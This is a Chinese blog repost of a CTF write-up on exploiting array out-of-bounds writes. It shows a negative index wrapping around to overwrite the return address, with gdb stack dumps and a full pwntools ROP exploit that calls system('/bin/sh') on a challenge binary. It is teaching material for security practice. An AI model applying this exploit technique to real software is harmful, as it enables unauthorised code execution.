c语言短整型范围越界,[原创]数组越界之入门向

最新推荐文章于 2022-10-03 11:01:52 发布
最新推荐文章于 2022-10-03 11:01:52 发布
阅读量684 收藏
点赞数
文章标签: c语言短整型范围越界

前言:

做题时候遇到的第一道数组越界的pwn题,其中负数利用有一块地方刚开始一直弄不太明白,发帖求助了一下,在此感谢holing大佬的帮助。

介绍:

0x1. 数组越界原理:

0x1. 堆中的数组越界:

因为堆是我们自己分配的,如果越界,那么会把堆中其他空间的数据给写掉,或读取了其他空间的数据,这样就会导致其他变量的数据变得不对,如果是一个指针的话,那么有可能会引起crash,这里我们主要谈论栈中的数组越界问题。

0x2. 栈中的数组越界:

因为栈是向下增长的,在进入一个函数之前,会先把参数和下一步要执行的指令地址(通过call实现)压栈,在函数的入口会把ebp压栈,并把esp赋值给ebp,在函数返回的时候,将ebp值赋给esp,pop先前栈内的上级函数栈的基地址给ebp,恢复原栈基址,然后把调用函数之前的压入栈的指令地址pop出来(通过ret实现)。

栈是由高往低增长的,而数组的存储是由低位往高位存的,如果越界的话,会把当前函数的ebp和下一跳的指令地址覆盖掉,如果覆盖了当前函数的ebp,那么在恢复的时候esp就不能指向正确的地方,从而导致未可知的情况,如果下一跳的地址也被覆盖掉,那么肯定会导致crash。

以下是我所画的数组元素在栈中的布局:

d420c6db167be331b86b542d73126536.png

这样一下看就很明显了,当你把数组的下标越过了最大索引值的时候,所指向的指针就会指向更高地址的栈空间段,所以我们就能够实现任意改写栈空间上的内容,同理,当下标为负数的时候指针会指向更低地址的栈空间段。但是这里就有一个需要注意的地方了,利用负数改写的话我们还能达到“负数变正数”的效果,这一点我们之后会讲到。

0x2. 正负数在计算机中的表示:

在C语言中,整数的基本数据类型分为短整型(short),整型(int),长整型(long),这三个数据类型还分为有符号和无符号,每种数据类型都有各自的大小范围,(因为数据类型的大小范围是编译器决定的,所以之后所述都默认是 64 位下使用 gcc-5.4),如下所示:

类型

字节

范围

short int

2byte(word)

0~32767(0~0x7fff) -32768~-1(0x8000~0xffff)

unsigned short int

2byte(word)

0~65535(0~0xffff)

int

4byte(dword)

0~2147483647(0~0x7fffffff) -2147483648~-1(0x80000000~0xffffffff)

unsigned int

4byte(dword)

0~4294967295(0~0xffffffff)

long int

8byte(qword)

正: 0~0x7fffffffffffffff 负:0x8000000000000000~0xffffffffffffffff

unsigned long int

8byte(qword)

0~0xffffffffffffffff

了解了数组越界的原理和利用方式之后,我们就来进入实践环节。

例题实践:

check一下:

[*] '/home/parallels/Desktop/3/pwn1'

Arch: amd64-64-little

RELRO: Partial RELRO

Stack: Canary found

NX: NX enabled

PIE: No PIE (0x400000)

64位,开了栈保护和nx。

主程序:

void hacker()

{

signed int j; // [rsp+8h] [rbp-78h]

signed int i; // [rsp+Ch] [rbp-74h]

__int64 v2; // [rsp+10h] [rbp-70h]

__int64 v3; // [rsp+18h] [rbp-68h]

__int64 s[11]; // [rsp+20h] [rbp-60h]

unsigned __int64 v5; // [rsp+78h] [rbp-8h]

v5 = __readfsqword(0x28u);

puts("Welcome to hacker's system\n");

puts("Now you can set hackers' age\n");

memset(s, 0, 0x50uLL);

for ( i = 0; i <= 9; ++i )

{

puts("Enter hacker index:");

__isoc99_scanf("%lld", &v2);

puts("Enter hacker age:");

__isoc99_scanf("%lld", &v3);

if ( v2 > 9 )

exit(0);

s[v2] = v3;

}

puts("Now let's see your creation:'");

for ( j = 0; j <= 9; ++j )

printf("%lld ", s[j]);

}

漏洞点就出现在数组索引上面,只判断了大于9的情况,没有判断小于0的情况。所以可以利用负数来进行绕过。gdb调试一下,找出数组的栈地址:

0x7fffffffdd50: 0x0000000000000014 0x00007fffffffddf0

0x7fffffffdd60: 0x0000000000000000 0x0000000000400881

0x7fffffffdd70: 0x00007ffff7dd26a3 0x00000000ffffdf00

0x7fffffffdd80: 0xfffffffffffffff8 0x0000000000000014

0x7fffffffdd90: 0x0000000000000000 0x0000000000000000 --start

0x7fffffffdda0: 0x0000000000000000 0x0000000000000000

0x7fffffffddb0: 0x0000000000000000 0x0000000000000000

0x7fffffffddc0: 0x0000000000000000 0x0000000000000000

0x7fffffffddd0: 0x0000000000000000 0x0000000000000000 --end

0x7fffffffdde0: 0x0000000000000000 0x4deabe7a5eca9400

0x7fffffffdd80处存储数组下标,0x7fffffffdd88处存储所要赋值给数组的内容。0x7fffffffdd90~0x7fffffffddd8处存储10个数组元素的内容。

再看看hack()函数的ret返回地址:

0x7fffffffddf8

当我设置下标为1,内容为20的时候,栈中的内容是这样的:

0x7fffffffdd70: 0x00007ffff7dd26a3 0x00000000ffffdf00

0x7fffffffdd80: 0x0000000000000001 0x0000000000000014

0x7fffffffdd90: 0x0000000000000000 0x0000000000000000

0x7fffffffdda0: 0x0000000000000000 0x0000000000000000

0x7fffffffddb0: 0x0000000000000000 0x0000000000000000

0x7fffffffddc0: 0x0000000000000000 0x0000000000000000

0x7fffffffddd0: 0x0000000000000000 0x0000000000000000

0x7fffffffdde0: 0x0000000000000000 0xaed11199af89ad00

0x7fffffffddf0: 0x00007fffffffde20 0x00000000004009ad

与上面我们所叙述的一样,当我们执行到这段汇编指令的时候:

0x400895 : mov rax,QWORD PTR [rbp-0x70]

0x400899 : mov rdx,QWORD PTR [rbp-0x68]

=> 0x40089d : mov QWORD PTR [rbp+rax*8-0x60],rdx

rax中存储的是索引值,rdx中存储的是内容,[rbp+rax*8-0x60]这一段实质上就是数组元素的偏移寻址,即我们上文所说的十个数组元素的存储地址寻址,rdx赋值给它,那么我们这样就可以利用负数,来修改比数组元素更低地址的空间内容了。

那么这里应该就有疑问了,ret返回地址不是在数组元素地址的更高地址吗?用负数怎么能够达到修改ret地址内容的效果呢?

上面我们已经了解到正负数在计算机中的表示了,为了更容易理解,我们直接实践能很快理解,我们设置下标为-1,内容为20,在栈中的表示是这样的:

0x7fffffffdd70: 0x00007ffff7dd26a3 0x00000000ffffdf00

0x7fffffffdd80: 0xffffffffffffffff 0x0000000000000014

0x7fffffffdd90: 0x0000000000000000 0x0000000000000000

0x7fffffffdda0: 0x0000000000000000 0x0000000000000000

可以看见-1表示成了0xffffffffffffffff。

现在来计算我们所需要输入的下标的值为多少才能覆盖返回地址。

ret地址:[rbp+0x8]

指向内存:[rbp+rax*8-0x60]

所以我们需要做到:(rbp+rax*8-0x60)%0x10000000000000000 == rbp+0x8,还有一个关键的点是还需要使rax的值为负数,即0x8000000000000000

这里为什么要取余数呢?因为64位程序中最高是16位(8字节),超出了16位最高位会被截断,所以这里我们可以得到多个可用的rax值。

0x800000000000000d,0xa00000000000000d,0xc00000000000000d,0xe00000000000000d

我们选用0xa00000000000000d来测试一下,转化成负数为-6917529027641081843。作为下标输入,栈中地址为:

0x7fffffffdd80: 0xa00000000000000d 0x0000000000000014

0x7fffffffdd90: 0x0000000000000000 0x0000000000000000

再看看[rbp+rax*8-0x60]地址:

gdb-peda$ p $rbp+$rax*8-0x60

$60 = (void *) 0x7fffffffddf8

成功任意改变栈地址内容。接下来就好构造了,有十次的机会写栈中的内容,足够了。

利用思路:

因为本身程序中就有system函数存在,所以我们只需要写入/bin/sh就好了。

利用scanf函数将/bin/sh写入bss段。

调用system函数。

这里具体怎么去利用就不细说了,主要讲数组越界利用的这一部分。

EXP:from pwn import *

p = process('./pwn1')

elf = ELF('pwn1')

p.recvuntil('name:\n')

p.sendline('yzq')

system_addr = elf.symbols['system']

bss_addr = elf.bss()

scanf_addr = elf.symbols['__isoc99_scanf']

pop_rdi = 0x400a33 #pop rdi;ret

pop_rsi = 0x400a31 #pop rsi;pop r15;ret

ret_addr = 6917529027641081843 #0xa00000000000000d的负数形式

scanf_formot = 0x400AFC

#gdb.attach(p)

#1

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr))

p.recvuntil('age:\n')

p.sendline('%s' % (pop_rdi))

#2

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-1))

p.recvuntil('age:\n')

p.sendline('%s' % (scanf_formot))

#3

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-2))

p.recvuntil('age:\n')

p.sendline('%s' % (pop_rsi))

#4

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-3))

p.recvuntil('age:\n')

p.sendline('%s' % (bss_addr))

#5

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-4))

p.recvuntil('age:\n')

p.sendline('%s' % (0x1)) #r15不相干,随意写

#6

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-5))

p.recvuntil('age:\n')

p.sendline('%s' % (scanf_addr))

#7

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-6))

p.recvuntil('age:\n')

p.sendline('%s' % (pop_rdi))

#8

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-7))

p.recvuntil('age:\n')

p.sendline('%s' % (bss_addr))

#9

p.recvuntil('index:\n')

p.sendline('-%s' % (ret_addr-8))

p.recvuntil('age:\n')

p.sendline('%s' % (system_addr))

#10

p.recvuntil('index:\n')

p.sendline('0')

p.recvuntil('age:\n')

p.sendline('0')

p.sendline('/bin/sh')

p.interactive()

相关链接:https://blog.csdn.net/qq_33438733/article/details/72851639

https://blog.csdn.net/human_evolution/article/details/40752047

https://ctf-wiki.github.io/ctf-wiki/pwn/integeroverflow/intof/

最后于 2018-6-19 23:30

被V1NKe编辑

,原因:

上传的附件:

5b1126f06e10c

(8.92kb,39次下载)

崔钟博汶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
c语言入门编程之数组操作子数组最大平均数.zip
06-06
C语言中,数组是一种非常基础且重要的数据结构,它允许我们存储一组相同类型的数据。在数组中,我们可以处理单个元素,也可以处理数组的一部分,也就是子数组。本教程将探讨如何在C语言中进行数组操作,特别是寻找...
C语言 数据结构之连续存储数组的算法
08-31
本文介绍的C语言数据结构之连续存储数组的算法,主要涵盖了数组的定义、初始化、状态检查、元素插入和追加等基本操作。理解这些概念和实现细节是学习数据结构和算法的基础,对于编写高效的C语言程序至关重要。通过...
c语言整数大小越界,整数越界相加并求第n个斐波纳契数(C语言实现)
weixin_35856883的博客
05-23 154
/** Fibonacci Numbers(斐波纳契数列)* 1, 1,2,3,5,8,13,21,34,55,89,144,233* 求第n个斐波纳契数*/#include #include #include int ctoi( char src ){switch( src ){case '1':return 1;case '2':return 2;case '3':return 3;case ...
c语言中存储整型数据越限分析
modi000的博客
01-16 955
1、每种数据类型存储的数据是有范围的,故超出该范围,数据会越限,造成数据错误。 例如: int类型,占用4个字节,其范围是从-2147483648~2147483647 (为何是此范围,详见https://blog.csdn.net/modi000/article/details/103882926) 上述为十进制范围,化为十六进制范围 0x0x8000 0000~0x7fff ffff ...
为什么在python中整数的值没有限制_Python 的整数与 Numpy 的数据溢出
weixin_39999116的博客
11-29 1037
某位 A 同学发了我一张截图,问为何结果中出现了负数?看了图,我第一感觉就是数据溢出了。数据超出能表示的最大值,就会出现奇奇怪怪的结果。然后,他继续发了张图,内容是 print(100000*208378),就是直接打印上图的 E[0]*G[0],结果是 20837800000,这是个正确的结果。所以新的问题是:如果说上图的数据溢出了,为何直接相乘的数却没有溢出?由于我一直忽视数据的表示规则(整型...
整型越界情况
weixin_67159771的博客
03-28 365
#include<stdio.h> int main() { int i; float n;//如果n定义成整型int n;后面算出来的n将会越界,程序无法编译,所以选用实型变量 float sum; sum=1.0; n=1.0; for(i=1;i<=49;i++){ n=n*i; sum=sum+1/n; } printf("sum=%f\n",sum); return 0; } D:\>gcc jiecheng.c D:\>a.exe s...
C语言:整型数据的溢出.2021-02-10
慕容雪羽
02-10 3029
#include <stdio.h> //预处理器命令 void main() { short int a,b; //声明a和b为整型 a=32767; //整型a赋值为32767 //32767转为带符号的二进制数为 0111111111111111,其中首位是符号位 //符号位的 0 表示 正数,1 表示负数 b=a+1; //整型b赋值为 整型a加1 /* 即: 在 0111111111111111 上 加1 (计算机内计算使用的是二进制), 得 01.
浅析C语言中的数组及字符数组
07-30
如果超出了这个范围,将会出现数组越界的问题。 本文中,我们讨论了 C 语言中的数组及字符数组的使用,并通过实例程序来说明数组的应用。学习数组的使用是学习 C 语言的基础知识之一。 MASTER IT!
c语言编程题之数组操作分发饼干.zip
最新发布
04-02
C语言中,数组是一种非常基础且重要的数据结构,它允许我们存储同类型的多个数据项。本编程题“数组操作分发饼干”旨在考察你对数组的理解以及在实际问题中的应用能力。这个问题可能是关于如何有效地分配资源,...
c语言编程题之数组操作非递减序列.zip
03-30
2. **声明数组**:声明一个数组的基本格式是`类型 数组名[大小]`,例如,整型数组`int arr[10]`可以存储10个整数。如果数组大小未知,可以使用动态分配,如`int *arr = (int*)malloc(n * sizeof(int))`。 3. **数组...
PWN入门数组越界
weixin_44681716的博客
05-04 2256
实验目的 利用数组越界的特性,去填充不能利用栈溢出的方法去覆盖的值。 通过这次实验,使我们掌握利用数组越界去继续泄露的方法。 实验文件 链接:https://pan.baidu.com/s/1tLyKYjdLXjLKjRHoivhYnQ 提取码:m6ra 我们主要通过2019年4月信息安全国赛的you_pwn来介绍一下怎么去利用数组越界。 实验步骤 首先介绍一下数组越界的原理: 数组越界分两种:一...
C语言基础 数据越界问题
qq_42948022的博客
10-10 977
#include <iostream> #include <bitset> #include<cmath> using namespace std; int main() { cout << "测试int转bool:" << endl; //只有0才是false cout << (bool)3 <&l...
[BUUCTF]PWN——wustctf2020_name_your_cat(数组越界
mcmuyanga的博客
03-13 1269
wustctf2020_name_your_cat 附件 步骤 例行检查,32位程序,开启了canary和nx 本地试运行一下看看大概的情况 32位ida载入,在检索字符串的时候发现了后门 主要函数
CISCN2021pwn pwny(数组越界,劫持exit_hook)
m0_51251108的博客
10-03 1155
CISCN2021pwn pwny(数组越界,劫持exit_hook)
整型转字符数组,字符数组整型
噗噗bug博客
07-14 238
一、整型转字符数组 void main() { char num[2]; short int a = 299; num[0] = (char)a ; num[1] = (char) (a >> 8); printf("%d\n", num[0]); printf("%d\n", num[1]); } 二、字符数组整型 void main() { char num[2]; short int a = 299; .
关于unsigned short越界的一个小实验
weixin_34337381的博客
09-30 453
前几天参加google笔试,有一道unsigned short的题目不会,想让自己试一下unsigned short的特性,于是: #include <cstdlib> #include <iostream> #include "stack.h" #include "stack.c" #include <vector> u...
short—溢出问题
liucai1018的博客
04-03 2553
代码概述:  * 1、定义两个short型值n和m,并赋初值(范围:-128~127)  * 2、再定义一个short型值sum=n加m;  * 3、执行 2 的操作时,程序会报错:  * --因为两个short值相加可能会越界,因此此处要进行强制类型转换成short型  */ 代码Demo: package common; import java.util.Scanner
整型数组以字符数组格式输出与大/小端序
姬小野的博客
03-05 832
选题三 仿照选题一中的代码,定义一个整型数/整型数组,应该如何实现?对如下代码你预估的执行结果是什么? 实际GCC 中执行结果是什么?请解析。 #include &amp;lt;stdio.h&amp;gt; int main() { char a[6]={'H','N','U','e','r','\0'}; char b[6]={72,78,85,101,114,0}; int c[...
short定义的两个数相加最后越界问题
zzz386021090的博客
04-07 861
Java程序语言提供了一些可以作用在整数值上的操作数:  *比较运算子,得到boolean型别的值:    *数值比较运算子<,>=,>,和>=(§15.20.1)    *数值相等运算子==和!=(§15.21.1)  *数值运算子,得到int或long型别的值:    *单元加减运算子+和-(§15.15.3,§15.15....
c语言怎么避免数组越界问题
11-06
C语言中,可以采取以下几种方式来避免数组越界问题: 1.初始化数组大小:在定义数组时,确保数组的大小足够大,能够容纳需要存储的元素数量,并进行正确的初始化操作。例如,如果需要存储10个整数,则定义一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值